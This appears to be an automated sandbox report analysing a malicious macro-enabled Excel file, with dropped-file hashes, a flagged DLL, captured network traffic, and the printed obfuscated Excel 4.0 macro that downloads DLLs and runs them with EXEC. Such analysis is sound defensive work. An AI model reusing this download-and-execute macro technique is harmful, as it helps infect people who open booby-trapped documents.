                    Preview: L..................F...........7G...z.).-...z.).-... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rs...Desktop.d......QK.X.Rs.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-351331057.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Fri Apr 9 22:43:37 2021, atime=Fri Apr 9 22:43:37 2021, length=98203, window=hide
                    Category:dropped
                    Size (bytes):2128
                    Entropy (8bit):4.5452623580979745
                    Encrypted:false
                    SSDEEP:48:8+H/XT0jkxJAqJrqbKQh2+H/XT0jkxJAqJrqbKQ/:8m/XojkxJACCKQh2m/XojkxJACCKQ/
                    MD5:72A7365B6F3DFD6BF7C97BEB763096D5
                    SHA1:C8A6E986B9E57304E905D6ECB0A33BE5D8CDCE9D
                    SHA-256:7A5A1E991059B0E765A30C19231448C5A12A4C645F05A236D68A6BDE7E97DA29
                    SHA-512:3208ECB05E4E3DF5120BA3D9A73E3DF49B4674059773C0CFE0E1A8FB2D4812D9A41314430445794442331F19D755E03FE8FED2AE3469E7CE4275ECDC54FB3D09
                    Malicious:false
                    Preview: L..................F.... ...I'..{...z.).-...a.).-...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2......Rp. .DOCUME~1.XLS..^.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.s.-.3.5.1.3.3.1.0.5.7...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\documents-351331057.xlsm./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.s.-.3.5.1.3.3.1.0.5.7...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_..
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):112
                    Entropy (8bit):4.640181681444124
                    Encrypted:false
                    SSDEEP:3:oyBVomxWKS9LR8RyUZELR8RyUmxWKS9LR8RyUv:dj49L6ZEL6N9L6v
                    MD5:B0563079CDA1FDF6A5226553A994DAA1
                    SHA1:54E2C87E0E6094ACA9C68AE8693EBD018E48DF3E
                    SHA-256:1085EA2B0429C2167666256B8D1676C3D78E630BAC5D2C436B9F0AA575359A47
                    SHA-512:3E551CF9BA78AFF3713BB0C4B6167C5EB54A3EB8FD0A758248059030163929F20B11B481F3FFC6A8932DDCF0085765B521BF5C4E462286CD8361ADD6F26064DA
                    Malicious:false
                    Preview: Desktop.LNK=0..[misc]..documents-351331057.LNK=0..documents-351331057.LNK=0..[misc]..documents-351331057.LNK=0..
                    C:\Users\user\Desktop\1DCE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):98203
                    Entropy (8bit):7.865919311689536
                    Encrypted:false
                    SSDEEP:1536:FRo2bdyZco+SkWShnt2hawGW7qusD9Byrty30wEGttZv9xEfYW/:FRo2bMKjSYhtMGW7qfD9ByrtyOG7ZVxa
                    MD5:BE06C76B1235F5EE138D979D40791758
                    SHA1:7D1946B1BC4C394040B35843D40A4EACB9870496
                    SHA-256:00C1B7FB01DE1B6BE0E365612A9DCFEC263204BCB1CB667200C85139DA360FAB
                    SHA-512:36BFB661E9068B9ADE2173E5A43A7054FE2A74497136D72D6BC50F2485F3AC2B4E688CF35239137D42A20D492974E353F97C483B0E9FB64F91627C1EBB2F4B51
                    Malicious:false
                    Preview: .U.n.0....?..........C....I?.&..an.0.........,.\.Qo.7.pz.........7.V..^i......;.0.....Z..d../g..u....e}J...({........G+....!...~1.|.....)s....,.I...o..c...{Y.e"...Hd..;.#R..BKP^.Y.n0D..{.dM..&.x.)Qa..^...Mm...|?".....!......u.......r8.........Z..GXJ.....q9.~..'.aZ.a%.4%.......s..&.{txD. ....../?..........`.:nN6..?..XF.../>S..y[..r....F....1......!.S.E.u.h~t.n.9.....C......>...az.}@...^.....:...a;....."M....l..w..j.6/...?.......PK..........!.\lC.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\Desktop\~$documents-351331057.xlsm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):330
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                    Malicious:true
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    C:\Users\user\ghnrope2.dll
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):186502
                    Entropy (8bit):6.182486294134606
                    Encrypted:false
                    SSDEEP:1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
                    MD5:E5726F9CD266AB1E58D53B6AE7C2BD5B
                    SHA1:C3CB80D45C8953E258F5DB8359EDC1E7042F1899
                    SHA-256:71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06
                    SHA-512:2CD34F6C63254E20696A5B15DB2C95F4F7E0278F840275CCB0DE92947359C2DD3FFCDDC0A6194ED25145FBA14EE7DF6B519A68FCCC2339F8E038DBE329F2C313
                    Malicious:true
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................Rich..........PE..d..._.p`.........." ......................................................................`.....................................................<...................................0...................................................0............................text............................... ..`.rdata..@...........................@..@.data...............................@....pdata...............~..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.878761964356076
                    TrID:
                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                    • ZIP compressed archive (8000/1) 16.67%
                    File name:documents-351331057.xlsm
                    File size:98253
                    MD5:672eb871d16413c505302778d8bf1cf9
                    SHA1:f88277af9b7f69e32b3c7cd74f8b25804933c093
                    SHA256:17ab700a69c80c034abefa11b191c5ef211f534442c7688256fb200d5b2f25a1
                    SHA512:492abf46277c12781c5e86dc838d1e5dd16206c343ec6f7e9b8a89d13485d56a1ac35642cee2257ae0652b415a30007c809d73a6a80760599ff2ace93fde5fa5
                    SSDEEP:1536:ZSRSI4oWt6JJwQz8jbzPmHnsBjFC6QomaIRUxPLe96bGAfe2hawpx:ZSE7oWt6Xz8jbzP0n4BC6Qdkx60WMD
                    File Content Preview:PK..........!.\lC.............[Content_Types].xml ...(.......................................................................................................................................................................................................""

                    File Icon

                    Icon Hash:e4e2aa8aa4bcbcac

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "documents-351331057.xlsm"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    "=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM24,'Doc1'!AO15&""1""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM25,'Doc1'!AO15&""2""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM26,'Doc1'!AO15&""3""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM27,'Doc1'!AO15&""4""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)='Doc1'!AO20()=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)"
                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\ghnrope""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP108)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP109)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Apr 9, 2021 16:44:00.307564974 CEST4916780192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.325624943 CEST80491678.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:00.325789928 CEST4916780192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.327064037 CEST4916780192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.387011051 CEST80491678.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:00.718256950 CEST80491678.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:00.718307972 CEST80491678.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:00.718537092 CEST4916780192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.718869925 CEST4916780192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.736754894 CEST80491678.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:00.753027916 CEST4916880192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.771636963 CEST80491688.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:00.771804094 CEST4916880192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.772741079 CEST4916880192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:00.835292101 CEST80491688.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:01.157820940 CEST80491688.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:01.157983065 CEST4916880192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:01.158150911 CEST4916880192.168.2.228.211.4.209
                    Apr 9, 2021 16:44:01.178180933 CEST80491688.211.4.209192.168.2.22
                    Apr 9, 2021 16:44:01.349013090 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:01.497051001 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:01.497240067 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:01.516869068 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:01.665504932 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:01.684956074 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:01.685096025 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:01.685137987 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:01.685323000 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:01.685379982 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:01.731050968 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:01.899466991 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:01.899764061 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.188755035 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.379283905 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404170990 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404280901 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404325962 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404366970 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404392004 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404405117 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404419899 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404444933 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404481888 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404516935 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404517889 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404534101 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404581070 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404593945 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404644012 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404719114 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404759884 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.404795885 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.404829979 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.409126997 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.552927971 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.552963018 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.552984953 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553004026 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553026915 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553062916 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553128004 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553139925 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553164005 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553194046 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553325891 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553349972 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553370953 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553425074 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553431988 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553451061 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553476095 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553509951 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553538084 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553637028 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553787947 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553843021 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553908110 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553941965 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553972960 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.553989887 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.553991079 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.554043055 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.554044008 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.554085016 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.554097891 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.554111004 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.554133892 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.554142952 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.554172039 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.554210901 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.561888933 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.699517965 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.699645042 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.699744940 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.699798107 CEST44349169162.251.80.27192.168.2.22
                    Apr 9, 2021 16:44:03.699810982 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.699848890 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.699855089 CEST49169443192.168.2.22162.251.80.27
                    Apr 9, 2021 16:44:03.699858904 CEST49169443192.168.2.22162.251.80.27
